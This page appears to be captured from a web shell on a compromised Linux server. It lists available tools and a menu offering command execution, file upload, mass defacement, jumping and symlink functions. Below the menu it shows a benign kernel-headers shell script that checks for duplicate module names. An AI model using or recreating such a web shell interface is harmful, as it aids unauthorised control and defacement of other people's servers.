OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/dict/../../src/linux-headers-5.4.0-204-generic/scripts/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh # SPDX-License-Identifier: GPL-2.0 set -e # Check uniqueness of module names check_same_name_modules() { for m in $(sed 's:.*/::' modules.order | sort | uniq -d) do echo "warning: same module names found:" >&2 sed -n "/\/$m/s:^: :p" modules.order >&2 done } check_same_name_modules